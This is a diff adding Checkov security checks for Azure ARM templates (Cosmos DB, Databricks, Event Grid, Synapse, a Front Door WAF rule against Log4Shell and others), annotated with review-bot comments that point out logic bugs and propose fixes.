+            else:
+                return CheckResult.FAILED
+        else:
+            return CheckResult.FAILED
+
+
+check = AzureSearchSLAIndex()
diff --git a/checkov/arm/checks/resource/AzureSearchSLAQueryUpdates.py b/checkov/arm/checks/resource/AzureSearchSLAQueryUpdates.py
new file mode 100644
index 00000000000..51053028ef1
--- /dev/null
+++ b/checkov/arm/checks/resource/AzureSearchSLAQueryUpdates.py
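Review bot: A non-integer `replicaCount` (for instance a parameter reference) is reported FAILED here but UNKNOWN by the sibling AzureSearchSLAQueryUpdates hunk, which also records `self.evaluated_keys = ["properties/replicaCount"]` while this check sets no evaluated key at all; the two checks read the same field and should agree on both points. Once the UNKNOWN branch is added, the `if/else` ladder reduces to `if isinstance(replica_count, int) and replica_count >= 3: return CheckResult.PASSED` followed by `return CheckResult.FAILED`.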
@@ -0,0 +1,39 @@
+from __future__ import annotations
+
+from typing import Any
+
+from checkov.common.models.enums import CheckCategories, CheckResult
+from checkov.arm.base_resource_check import BaseResourceCheck
+
+
+class AzureSearchSQLQueryUpdates(BaseResourceCheck):
+    def __init__(self) -> None:
+        # Cognitive Search services support indexing and querying. Indexing is the process of loading content
+        # into the service to make it searchable. Querying is the process where a client searches for content
+        # by sending queries to the index.
+        # Cognitive Search supports a configurable number of replicas.
+        # Having multiple replicas allows queries and index updates to load balance across multiple replicas.
+        # To receive a Service Level Agreement (SLA) for Search index queries a minimum of 2 replicas is required.
+        name = "Ensure that Azure Cognitive Search maintains SLA for search index queries"
+        id = "CKV_AZURE_209"
+        supported_resources = ["Microsoft.Search/searchServices", ]
+        categories = [CheckCategories.GENERAL_SECURITY, ]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def scan_resource_conf(self, conf: dict[str, Any]) -> CheckResult:
+        self.evaluated_keys = ["properties/replicaCount"]
+
+        properties = conf.get("properties", {})
+        if not isinstance(properties, dict):
+            return CheckResult.FAILED
+        replica_count = properties.get("replicaCount")
+        if replica_count:
+            if not isinstance(replica_count, int):
+                return CheckResult.UNKNOWN
+            if replica_count >= 2:
+                return CheckResult.PASSED
+
+        return CheckResult.FAILED
+
+
+check = AzureSearchSQLQueryUpdates()
diff --git a/checkov/arm/checks/resource/AzureServiceFabricClusterProtectionLevel.py b/checkov/arm/checks/resource/AzureServiceFabricClusterProtectionLevel.py
new file mode 100644
index 00000000000..015d45fa697
--- /dev/null
+++ b/checkov/arm/checks/resource/AzureServiceFabricClusterProtectionLevel.py
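Review bot: The class is named `AzureSearchSQLQueryUpdates` in a file named AzureSearchSLAQueryUpdates.py, and the check is about an SLA, not SQL; rename it to `class AzureSearchSLAQueryUpdates(BaseResourceCheck):` and the instantiation to `check = AzureSearchSLAQueryUpdates()` before the name gets referenced from tests or the registry. The scan logic itself matches the 2-replica requirement stated in the header comment.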
@@ -0,0 +1,44 @@ +from typing import Dict, List, Any, Union +from checkov.common.models.enums import CheckCategories, CheckResult +from checkov.arm.base_resource_check import BaseResourceCheck +from checkov.common.util.type_forcers import force_list + + +class AzureServiceFabricClusterProtectionLevel(BaseResourceCheck): + def __init__(self) -> None: + name = "Ensures that Service Fabric use three levels of protection available" + id = "CKV_AZURE_125" + supported_resources = ('Microsoft.ServiceFabric/clusters',) + categories = (CheckCategories.ENCRYPTION,) + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def scan_resource_conf(self, conf: Dict[str, List[Any]]) -> CheckResult: + properties: Union[List[Any], Dict[str, Any]] = conf.get('properties', {}) + if not isinstance(properties, dict): + self.evaluated_keys = ['properties'] + return CheckResult.FAILED + + settings_conf = force_list(properties.get('fabricSettings', [])) + if not isinstance(settings_conf, list): + self.evaluated_keys = ['properties/fabricSettings'] + return CheckResult.FAILED + + for setting in settings_conf: + if setting and isinstance(setting, dict) and setting.get('name') == 'Security': + params = setting.get('parameters', [{}]) + if isinstance(params, list) and len(params) > 0 and isinstance(params[0], dict): + param = params[0] + if param.get('name') == 'ClusterProtectionLevel' and param.get('value') == 'EncryptAndSign': + index = settings_conf.index(setting) + self.evaluated_keys = [f'fabricSettings/{index}/parameters/name', + f'fabricSettings/{index}/parameters/value'] + return CheckResult.PASSED + else: + self.evaluated_keys = [f'fabricSettings/{settings_conf.index(setting)}/parameters'] + return CheckResult.FAILED + + self.evaluated_keys = ['fabricSettings'] + return CheckResult.FAILED + + +check = AzureServiceFabricClusterProtectionLevel() 
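Review bot: In `scan_resource_conf` the `Security` setting is judged on `params[0]` only, so a template whose `parameters` list carries `ClusterProtectionLevel` at any other position is reported FAILED even when its value is `EncryptAndSign`, and `evaluated_keys` then points at `parameters` rather than at the parameter that decided the result. The `evaluated_keys` paths are also inconsistent: the early-return branches use `properties/fabricSettings` while the loop emits `fabricSettings/{index}/...` without the `properties/` prefix. The `isinstance(settings_conf, list)` guard after `force_list` is redundant and can go. Below is the loop body rewritten to scan every parameter of the `Security` setting and to report the matching parameter path.
```python
        for setting in settings_conf:
            if setting and isinstance(setting, dict) and setting.get('name') == 'Security':
                index = settings_conf.index(setting)
                params = setting.get('parameters', [{}])
                if isinstance(params, list):
                    for param_idx, param in enumerate(params):
                        if not isinstance(param, dict) or param.get('name') != 'ClusterProtectionLevel':
                            continue
                        self.evaluated_keys = [f'properties/fabricSettings/{index}/parameters/[{param_idx}]/name',
                                               f'properties/fabricSettings/{index}/parameters/[{param_idx}]/value']
                        if param.get('value') == 'EncryptAndSign':
                            return CheckResult.PASSED
                        return CheckResult.FAILED
                # Security setting present but no ClusterProtectionLevel parameter at all
                self.evaluated_keys = [f'properties/fabricSettings/{index}/parameters']
                return CheckResult.FAILED
        # … unchanged: final evaluated_keys assignment and FAILED return …
```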
diff --git a/checkov/arm/checks/resource/AzureSparkPoolIsolatedComputeEnabled.py b/checkov/arm/checks/resource/AzureSparkPoolIsolatedComputeEnabled.py new file mode 100644 index 00000000000..ba9a04d3ac3 --- /dev/null +++ b/checkov/arm/checks/resource/AzureSparkPoolIsolatedComputeEnabled.py @@ -0,0 +1,17 @@ +from checkov.common.models.enums import CheckCategories +from checkov.arm.base_resource_value_check import BaseResourceValueCheck + + +class AzureSparkPoolIsolatedComputeEnabled(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure isolated compute is enabled for Synapse Spark pools" + id = "CKV_AZURE_242" + supported_resources = ["Microsoft.Synapse/workspaces/bigDataPools"] + categories = [CheckCategories.GENERAL_SECURITY] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def get_inspected_key(self) -> str: + return 'properties/isComputeIsolationEnabled' + + +check = AzureSparkPoolIsolatedComputeEnabled() diff --git a/checkov/arm/checks/resource/AzureSynapseWorkspaceVAisEnabled.py b/checkov/arm/checks/resource/AzureSynapseWorkspaceVAisEnabled.py new file mode 100644 index 00000000000..c84c79fa73c --- /dev/null +++ b/checkov/arm/checks/resource/AzureSynapseWorkspaceVAisEnabled.py @@ -0,0 +1,17 @@ +from checkov.common.models.enums import CheckCategories +from checkov.arm.base_resource_value_check import BaseResourceValueCheck + + +class SynapseWorkspaceVAisEnabled(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure that Azure Synapse Workspace vulnerability assessment is enabled" + id = "CKV2_AZURE_46" + supported_resources = ["Microsoft.Synapse/workspaces/vulnerabilityAssessments"] + categories = [CheckCategories.GENERAL_SECURITY] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def get_inspected_key(self) -> str: + return 'properties/recurringScans/isEnabled' + + +check = SynapseWorkspaceVAisEnabled() 
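Review bot: In the second hunk the class is `SynapseWorkspaceVAisEnabled` but the module is `AzureSynapseWorkspaceVAisEnabled.py`; every other new check on this page names the class after its file, so the missing `Azure` prefix reads as an oversight and hampers discovery. Because the check is bound to `Microsoft.Synapse/workspaces/vulnerabilityAssessments`, it presumably only runs when that child resource is declared, so a workspace with no vulnerability assessment resource at all is never evaluated; a one-line comment above `supported_resources` stating that limitation would spare the next reader a wrong assumption, e.g. `# Only evaluates declared vulnerabilityAssessments resources; a workspace without one is not flagged here`.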
diff --git a/checkov/arm/checks/resource/AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.py b/checkov/arm/checks/resource/AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.py new file mode 100644 index 00000000000..7c2d0bc94da --- /dev/null +++ b/checkov/arm/checks/resource/AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.py @@ -0,0 +1,23 @@ +from typing import Dict, List, Any +from checkov.common.models.enums import CheckCategories, CheckResult +from checkov.arm.base_resource_check import BaseResourceCheck + + +class AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached(BaseResourceCheck): + def __init__(self) -> None: + name = "Ensure that Azure Synapse workspaces have no IP firewall rules attached" + id = "CKV2_AZURE_19" + supported_resources = ["Microsoft.Synapse/workspaces"] + categories = [CheckCategories.NETWORKING] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def scan_resource_conf(self, conf: Dict[str, List[Any]]) -> CheckResult: + depends_on = conf.get("dependsOn") + if depends_on is None or not len(depends_on): + return CheckResult.PASSED + if any('Microsoft.Synapse/workspaces/firewallRules' in item for item in depends_on): + return CheckResult.FAILED + return CheckResult.PASSED + + +check = AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached() diff --git a/checkov/arm/checks/resource/CognitiveServicesConfigureIdentity.py b/checkov/arm/checks/resource/CognitiveServicesConfigureIdentity.py new file mode 100644 index 00000000000..df85e2f879e --- /dev/null +++ b/checkov/arm/checks/resource/CognitiveServicesConfigureIdentity.py 
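Review bot: `scan_resource_conf` in AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached decides solely from the workspace's own `dependsOn`, but in ARM the dependency normally runs the other way: the `Microsoft.Synapse/workspaces/firewallRules` child resource depends on the workspace, so a template that declares firewall rules as separate resources leaves the workspace's `dependsOn` empty and the check reports PASSED. If the intent is to catch attached rules, the runner would need to look at sibling resources (or nested `resources` of the workspace), which this check cannot see from `conf` alone; at minimum a comment should state that only rules referenced from `dependsOn` are detected. The `if depends_on is None or not len(depends_on)` guard simplifies to `if not depends_on:`.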
@@ -0,0 +1,22 @@ +from typing import Any +from checkov.common.models.consts import ANY_VALUE +from checkov.common.models.enums import CheckCategories +from checkov.arm.base_resource_value_check import BaseResourceValueCheck + + +class CognitiveServicesConfigureIdentity(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure that all Azure Cognitive Services accounts are configured with a managed identity" + id = "CKV_AZURE_238" + supported_resources = ('Microsoft.CognitiveServices/accounts',) + categories = (CheckCategories.GENERAL_SECURITY,) + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def get_inspected_key(self) -> str: + return "identity/type" + + def get_expected_value(self) -> Any: + return ANY_VALUE + + +check = CognitiveServicesConfigureIdentity() diff --git a/checkov/arm/checks/resource/CognitiveServicesEnableLocalAuth.py b/checkov/arm/checks/resource/CognitiveServicesEnableLocalAuth.py new file mode 100644 index 00000000000..ff8d0cf86b8 --- /dev/null +++ b/checkov/arm/checks/resource/CognitiveServicesEnableLocalAuth.py @@ -0,0 +1,27 @@ +from typing import Any + +from checkov.common.models.enums import CheckCategories +from checkov.arm.base_resource_value_check import BaseResourceValueCheck + + +class CognitiveServicesEnableLocalAuth(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure that Cognitive Services accounts disable local authentication" + id = "CKV_AZURE_236" + supported_resources = ('Microsoft.CognitiveServices/accounts', ) + categories = (CheckCategories.NETWORKING, ) + super().__init__( + name=name, + id=id, + categories=categories, + supported_resources=supported_resources, + ) + + def get_inspected_key(self) -> str: + return 'properties/disableLocalAuth' + + def get_expected_value(self) -> Any: + return True + + +check = CognitiveServicesEnableLocalAuth() 
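Review bot: `get_expected_value` in CognitiveServicesConfigureIdentity returns `ANY_VALUE` for `identity/type`, but the ARM identity schema accepts the literal `"None"` as a type, so a resource that explicitly declares `"identity": {"type": "None"}` satisfies the check even though no managed identity is configured. Listing the identity-bearing values is more precise, e.g. override `get_expected_values` to return `["SystemAssigned", "UserAssigned", "SystemAssigned, UserAssigned"]` and drop `get_expected_value`. The same `ANY_VALUE` on `identity/type` pattern appears in EventgridTopicIdentityProviderEnabled later on this page and should be fixed the same way.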
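Review bot: CognitiveServicesEnableLocalAuth (second hunk) uses `categories = (CheckCategories.NETWORKING, )` although `properties/disableLocalAuth` is an authentication control, not a network one; the analogous CosmosDBLocalAuthDisabled and EventgridTopicLocalAuthentication checks on this page use `CheckCategories.IAM`. Switching to `categories = (CheckCategories.IAM, )` keeps category-based filtering of local-auth findings consistent across the ARM checks.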
diff --git a/checkov/arm/checks/resource/CosmosDBAccountsRestrictedAccess.py b/checkov/arm/checks/resource/CosmosDBAccountsRestrictedAccess.py new file mode 100644 index 00000000000..2d8d8310b84 --- /dev/null +++ b/checkov/arm/checks/resource/CosmosDBAccountsRestrictedAccess.py @@ -0,0 +1,32 @@ +from typing import Dict, Any, Optional + +from checkov.common.models.enums import CheckResult, CheckCategories +from checkov.arm.base_resource_check import BaseResourceCheck + + +class CosmosDBAccountsRestrictedAccess(BaseResourceCheck): + def __init__(self) -> None: + name = "Ensure Cosmos DB accounts have restricted access" + id = "CKV_AZURE_99" + supported_resources = ('Microsoft.DocumentDB/databaseAccounts',) + categories = [CheckCategories.NETWORKING] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def scan_resource_conf(self, conf: Dict[str, Any]) -> CheckResult: + properties: Optional[Dict[str, Any]] = conf.get('properties') + if properties is not None: + if 'enableMultipleWriteLocations' not in properties or properties['enableMultipleWriteLocations']: + self.evaluated_keys = ['enableMultipleWriteLocations'] + if 'isVirtualNetworkFilterEnabled' in properties and properties['isVirtualNetworkFilterEnabled']: + self.evaluated_keys.append('isVirtualNetworkFilterEnabled') + if 'virtualNetworkRules' in properties and properties['virtualNetworkRules']: + self.evaluated_keys.append('virtualNetworkRules') + return CheckResult.PASSED + if 'ipRules' in properties and properties['ipRules']: + self.evaluated_keys.append('ipAddressOrRange') + return CheckResult.PASSED + return CheckResult.FAILED + return CheckResult.PASSED + + +check = CosmosDBAccountsRestrictedAccess() diff --git a/checkov/arm/checks/resource/CosmosDBLocalAuthDisabled.py b/checkov/arm/checks/resource/CosmosDBLocalAuthDisabled.py new file mode 100644 index 00000000000..3ce55f1d438 --- /dev/null +++ b/checkov/arm/checks/resource/CosmosDBLocalAuthDisabled.py 
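Review bot: In CosmosDBAccountsRestrictedAccess the outer gate is `'enableMultipleWriteLocations' not in properties or properties['enableMultipleWriteLocations']`, but that property controls multi-region writes, not network exposure, so an account with `enableMultipleWriteLocations: false` and no IP or VNet restriction is reported PASSED. The ARM counterpart of the public-exposure gate appears to be `properties/publicNetworkAccess` (`"Enabled"`/`"Disabled"`); I would gate on that, e.g. `if properties.get('publicNetworkAccess', 'Enabled') != 'Disabled':`, and confirm against the Terraform version of CKV_AZURE_99. The recorded `evaluated_keys` also lack the `properties/` prefix and the last one names `ipAddressOrRange` although the inspected key is `ipRules`; `'properties/ipRules'` would match what the code reads.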
@@ -0,0 +1,27 @@ +from __future__ import annotations +from typing import Any +from checkov.common.models.enums import CheckCategories, CheckResult +from checkov.arm.base_resource_value_check import BaseResourceValueCheck + + +class CosmosDBLocalAuthDisabled(BaseResourceValueCheck): + def __init__(self) -> None: + description = "Ensure that Local Authentication is disabled on CosmosDB" + id = "CKV_AZURE_140" + supported_resources = ('Microsoft.DocumentDB/databaseAccounts',) + categories = (CheckCategories.IAM,) + super().__init__(name=description, id=id, categories=categories, supported_resources=supported_resources,) + + def scan_resource_conf(self, conf: dict[str, Any]) -> CheckResult: + if conf.get("kind") == "GlobalDocumentDB": + return super().scan_resource_conf(conf) + return CheckResult.UNKNOWN + + def get_inspected_key(self) -> str: + return "properties/disableLocalAuth" + + def get_expected_value(self) -> bool: + return True + + +check = CosmosDBLocalAuthDisabled() diff --git a/checkov/arm/checks/resource/DataExplorerUsesDiskEncryption.py b/checkov/arm/checks/resource/DataExplorerUsesDiskEncryption.py new file mode 100644 index 00000000000..785063e4b29 --- /dev/null +++ b/checkov/arm/checks/resource/DataExplorerUsesDiskEncryption.py @@ -0,0 +1,20 @@ +from checkov.common.models.enums import CheckCategories +from checkov.arm.base_resource_value_check import BaseResourceValueCheck + + +class DataExplorerUsesDiskEncryption(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure that Azure Data Explorer (Kusto) uses disk encryption" + id = "CKV_AZURE_74" + supported_resources = ("Microsoft.Kusto/clusters",) + categories = [CheckCategories.ENCRYPTION,] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources,) + + def get_inspected_key(self) -> str: + return "properties/enableDiskEncryption" + + def get_expected_value(self) -> bool: + return True + + +check = DataExplorerUsesDiskEncryption() 
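Review bot: `scan_resource_conf` in CosmosDBLocalAuthDisabled returns UNKNOWN whenever `kind` is absent, yet `kind` is optional on `Microsoft.DocumentDB/databaseAccounts` and, to my knowledge, defaults to `GlobalDocumentDB`, so the most common SQL-API template (no `kind` set) is never evaluated. Treating the omitted value as the default keeps those accounts in scope: `if conf.get("kind", "GlobalDocumentDB") == "GlobalDocumentDB":`. A short comment explaining why other kinds yield UNKNOWN (the property is only meaningful for the SQL API) would also help the next maintainer.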
diff --git a/checkov/arm/checks/resource/DataFactoryNoPublicNetworkAccess.py b/checkov/arm/checks/resource/DataFactoryNoPublicNetworkAccess.py new file mode 100644 index 00000000000..5843d9ff0d3 --- /dev/null +++ b/checkov/arm/checks/resource/DataFactoryNoPublicNetworkAccess.py @@ -0,0 +1,22 @@ +from typing import Any + +from checkov.common.models.enums import CheckCategories +from checkov.arm.base_resource_value_check import BaseResourceValueCheck + + +class DataFactoryNoPublicNetworkAccess(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure that Azure Data factory public network access is disabled" + id = "CKV_AZURE_104" + supported_resources = ("Microsoft.DataFactory/factories",) + categories = (CheckCategories.NETWORKING,) + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def get_inspected_key(self) -> str: + return "properties/publicNetworkAccess" + + def get_expected_value(self) -> Any: + return "Disabled" + + +check = DataFactoryNoPublicNetworkAccess() diff --git a/checkov/arm/checks/resource/DataLakeStoreEncryption.py b/checkov/arm/checks/resource/DataLakeStoreEncryption.py new file mode 100644 index 00000000000..76c5f50eb6c --- /dev/null +++ b/checkov/arm/checks/resource/DataLakeStoreEncryption.py 
@@ -0,0 +1,20 @@ +from checkov.common.models.enums import CheckResult, CheckCategories +from checkov.arm.base_resource_value_check import BaseResourceValueCheck + + +class DataLakeStoreEncryption(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure that Data Lake Store accounts enables encryption" + id = "CKV_AZURE_105" + supported_resources = ['Microsoft.DataLakeStore/accounts',] + categories = [CheckCategories.ENCRYPTION,] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources, missing_block_result=CheckResult.PASSED) + + def get_inspected_key(self) -> str: + return 'properties/encryptionState' + + def get_expected_value(self) -> str: + return "Enabled" + + +check = DataLakeStoreEncryption() diff --git a/checkov/arm/checks/resource/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py b/checkov/arm/checks/resource/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py new file mode 100644 index 00000000000..ee16ea9731f --- /dev/null +++ b/checkov/arm/checks/resource/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py 
@@ -0,0 +1,32 @@ +from __future__ import annotations + +from typing import Any + +from checkov.common.models.enums import CheckResult, CheckCategories +from checkov.arm.base_resource_check import BaseResourceCheck +from checkov.common.util.data_structures_utils import find_in_dict + + +class DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey(BaseResourceCheck): + def __init__(self) -> None: + # https://learn.microsoft.com/en-us/azure/templates/microsoft.databricks/workspaces?pivots=deployment-language-arm-template#workspaceencryptionparameter-1 + name = "Ensure that Databricks Workspaces enables customer-managed key for root DBFS encryption" + id = "CKV2_AZURE_48" + supported_resources = ("Microsoft.Databricks/workspaces",) + categories = (CheckCategories.ENCRYPTION,) + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def scan_resource_conf(self, conf: dict[str, Any]) -> CheckResult: + parameters = conf.get("properties", {}).get("parameters") + prepare_encryption = find_in_dict(input_dict=parameters, key_path="prepareEncryption/value") + if not prepare_encryption or str(prepare_encryption).lower() != "true": + return CheckResult.FAILED + + encryption_settings = find_in_dict(input_dict=parameters, key_path="encryption/value") + if not encryption_settings: + return CheckResult.FAILED + + return CheckResult.PASSED + + +check = DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey() diff --git a/checkov/arm/checks/resource/DatabricksWorkspaceIsNotPublic.py b/checkov/arm/checks/resource/DatabricksWorkspaceIsNotPublic.py new file mode 100644 index 00000000000..aaae17689c8 --- /dev/null +++ b/checkov/arm/checks/resource/DatabricksWorkspaceIsNotPublic.py 
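Review bot: The second test in `scan_resource_conf` only checks that `encryption/value` exists, but the `WorkspaceEncryptionParameter` linked in the comment carries a `keySource` of either `Default` (Microsoft-managed) or `Microsoft.Keyvault`, so a workspace that sets `encryption` with the default key source passes a check whose name requires a customer-managed key. Reading the key source is a one-line change: `key_source = find_in_dict(input_dict=parameters, key_path="encryption/value/keySource")` followed by `if key_source != "Microsoft.Keyvault": return CheckResult.FAILED`. Separately, `conf.get("properties", {}).get("parameters")` raises if `properties` is not a dict, and `parameters` may be `None` when the block is missing; whether `find_in_dict` tolerates `None` is not visible here, so an explicit `if not isinstance(parameters, dict): return CheckResult.FAILED` guard would make the behaviour deterministic.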
@@ -0,0 +1,27 @@ +from __future__ import annotations + +from typing import Any + +from checkov.common.models.enums import CheckResult, CheckCategories +from checkov.arm.base_resource_check import BaseResourceCheck +from checkov.common.util.data_structures_utils import find_in_dict + + +class DatabricksWorkspaceIsNotPublic(BaseResourceCheck): + def __init__(self) -> None: + # https://learn.microsoft.com/en-us/azure/templates/microsoft.databricks/workspaces?pivots=deployment-language-arm-template + name = "Ensure Databricks Workspace data plane to control plane communication happens over private link" + id = "CKV_AZURE_158" + supported_resources = ("Microsoft.Databricks/workspaces",) + categories = (CheckCategories.NETWORKING,) + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def scan_resource_conf(self, conf: dict[str, Any]) -> CheckResult: + public_network_access = find_in_dict(input_dict=conf, key_path="properties/publicNetworkAccess") + if not public_network_access or public_network_access == "Enabled": + return CheckResult.FAILED + + return CheckResult.PASSED + + +check = DatabricksWorkspaceIsNotPublic() diff --git a/checkov/arm/checks/resource/EventHubNamespaceMinTLS12.py b/checkov/arm/checks/resource/EventHubNamespaceMinTLS12.py new file mode 100644 index 00000000000..20e8e13b917 --- /dev/null +++ b/checkov/arm/checks/resource/EventHubNamespaceMinTLS12.py 
@@ -0,0 +1,25 @@ +from __future__ import annotations + +from typing import Any + +from checkov.common.models.enums import CheckCategories, CheckResult +from checkov.arm.base_resource_value_check import BaseResourceValueCheck + + +class EventHubNamespaceMinTLS12(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure Event Hub Namespace uses at least TLS 1.2" + id = "CKV_AZURE_223" + supported_resources = ["Microsoft.EventHub/namespaces", ] + categories = [CheckCategories.ENCRYPTION, ] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources, + missing_block_result=CheckResult.PASSED) + + def get_inspected_key(self) -> str: + return "properties/minimumTlsVersion" + + def get_expected_value(self) -> Any: + return "1.2" + + +check = EventHubNamespaceMinTLS12() diff --git a/checkov/arm/checks/resource/EventgridTopicIdentityProviderEnabled.py b/checkov/arm/checks/resource/EventgridTopicIdentityProviderEnabled.py new file mode 100644 index 00000000000..9156f68b281 --- /dev/null +++ b/checkov/arm/checks/resource/EventgridTopicIdentityProviderEnabled.py @@ -0,0 +1,23 @@ +from typing import Any + +from checkov.arm.base_resource_value_check import BaseResourceValueCheck +from checkov.common.models.consts import ANY_VALUE +from checkov.common.models.enums import CheckCategories + + +class EventgridTopicIdentityProviderEnabled(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure that Managed identity provider is enabled for Azure Event Grid Topic" + id = "CKV_AZURE_191" + supported_resources = ("Microsoft.EventGrid/topics",) + categories = (CheckCategories.IAM,) + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def get_inspected_key(self) -> str: + return "identity/type" + + def get_expected_value(self) -> Any: + return ANY_VALUE + + +check = EventgridTopicIdentityProviderEnabled() 
diff --git a/checkov/arm/checks/resource/EventgridTopicLocalAuthentication.py b/checkov/arm/checks/resource/EventgridTopicLocalAuthentication.py new file mode 100644 index 00000000000..e403a00fe96 --- /dev/null +++ b/checkov/arm/checks/resource/EventgridTopicLocalAuthentication.py @@ -0,0 +1,20 @@ +from checkov.arm.base_resource_value_check import BaseResourceValueCheck +from checkov.common.models.enums import CheckCategories + + +class EventgridTopicLocalAuthentication(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure that Azure Event Grid Topic local Authentication is disabled" + id = "CKV_AZURE_192" + supported_resources = ("Microsoft.EventGrid/topics",) + categories = (CheckCategories.IAM,) + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def get_inspected_key(self) -> str: + return "properties/disableLocalAuth" + + def get_expected_value(self) -> bool: + return True + + +check = EventgridTopicLocalAuthentication() diff --git a/checkov/arm/checks/resource/EventgridTopicNetworkAccess.py b/checkov/arm/checks/resource/EventgridTopicNetworkAccess.py new file mode 100644 index 00000000000..57b792d7c22 --- /dev/null +++ b/checkov/arm/checks/resource/EventgridTopicNetworkAccess.py 
@@ -0,0 +1,20 @@ +from checkov.arm.base_resource_value_check import BaseResourceValueCheck +from checkov.common.models.enums import CheckCategories + + +class EventgridTopicNetworkAccess(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure public network access is disabled for Azure Event Grid Topic" + id = "CKV_AZURE_193" + supported_resources = ("Microsoft.EventGrid/topics",) + categories = (CheckCategories.NETWORKING,) + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def get_inspected_key(self) -> str: + return "properties/publicNetworkAccess" + + def get_expected_value(self) -> str: + return "Disabled" + + +check = EventgridTopicNetworkAccess() diff --git a/checkov/arm/checks/resource/FrontDoorWAFACLCVE202144228.py b/checkov/arm/checks/resource/FrontDoorWAFACLCVE202144228.py new file mode 100644 index 00000000000..404782107d3 --- /dev/null +++ b/checkov/arm/checks/resource/FrontDoorWAFACLCVE202144228.py 
@@ -0,0 +1,54 @@ +from typing import Dict, Any + +from checkov.common.models.enums import CheckCategories, CheckResult +from checkov.common.util.type_forcers import force_list +from checkov.arm.base_resource_check import BaseResourceCheck + + +class FrontDoorWAFACLCVE202144228(BaseResourceCheck): + def __init__(self) -> None: + name = "Ensure Front Door WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell" + id = "CKV_AZURE_133" + supported_resources = ["Microsoft.Network/frontdoorWebApplicationFirewallPolicies"] + categories = [CheckCategories.APPLICATION_SECURITY] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def scan_resource_conf(self, conf: Dict[Any, Any]) -> CheckResult: + self.evaluatedKeys = ["managedRules"] + properties = conf.get("properties") + if properties is None or "managedRules" not in properties: + return CheckResult.FAILED + + managedRules = properties.get("managedRules") + if not managedRules: + return CheckResult.FAILED + + for idx_managed_rule, managed_rule in enumerate(force_list(managedRules.get("managedRuleSets", []))): + self.evaluated_keys = [f"managedRules/[{idx_managed_rule}]/type"] + if managed_rule and managed_rule.get("ruleSetType") in ["DefaultRuleSet", "Microsoft_DefaultRuleSet"]: + ruleOverrides = managed_rule.get("ruleGroupOverrides", []) + if ruleOverrides == []: + return CheckResult.PASSED + for idx_override, rule_override in enumerate(force_list(ruleOverrides)): + self.evaluated_keys.append( + f"managedRules/[{idx_managed_rule}]/ruleGroupOverrides/[{idx_override}]/ruleGroupName" + ) + if rule_override.get("ruleGroupName") == "JAVA": + rules = rule_override.get("rules", []) + for idx_rule, rule in enumerate(force_list(rules)): + self.evaluated_keys.extend([ + f"managedRules/[{idx_managed_rule}]/ruleGroupOverrides/[{idx_override}]/rules/[{idx_rule}]/ruleId", + 
f"managedRules/[{idx_managed_rule}]/ruleGroupOverrides/[{idx_override}]/rules/[{idx_rule}]/enabledState", + f"managedRules/[{idx_managed_rule}]/ruleGroupOverrides/[{idx_override}]/rules/[{idx_rule}]/action", + ]) + if rule.get("ruleId") == "944240": + enabledState = rule.get("enabledState") + if not enabledState: + return CheckResult.FAILED + if rule.get("action") in ["Block", "Redirect"]: + return CheckResult.PASSED + + return CheckResult.FAILED + + +check = FrontDoorWAFACLCVE202144228() diff --git a/checkov/arm/checks/resource/FunctionAppDisallowCORS.py b/checkov/arm/checks/resource/FunctionAppDisallowCORS.py new file mode 100644 index 00000000000..e8b98b464d5 --- /dev/null +++ b/checkov/arm/checks/resource/FunctionAppDisallowCORS.py @@ -0,0 +1,24 @@ +from typing import List, Any +from checkov.common.models.enums import CheckCategories, CheckResult +from checkov.arm.base_resource_negative_value_check import BaseResourceNegativeValueCheck + + +class FunctionAppDisallowCORS(BaseResourceNegativeValueCheck): + + def __init__(self) -> None: + name = "Ensure function apps are not accessible from all regions" + id = "CKV_AZURE_62" + supported_resources = ("Microsoft.Web/sites",) + categories = (CheckCategories.GENERAL_SECURITY,) + super().__init__(name=name, id=id, categories=categories, + supported_resources=supported_resources, + missing_block_result=CheckResult.PASSED) + + def get_inspected_key(self) -> str: + return "properties/siteConfig/cors/allowedOrigins" + + def get_forbidden_values(self) -> List[Any]: + return ["*"] + + +check = FunctionAppDisallowCORS() diff --git a/checkov/arm/checks/resource/FunctionAppHttpVersionLatest.py b/checkov/arm/checks/resource/FunctionAppHttpVersionLatest.py new file mode 100644 index 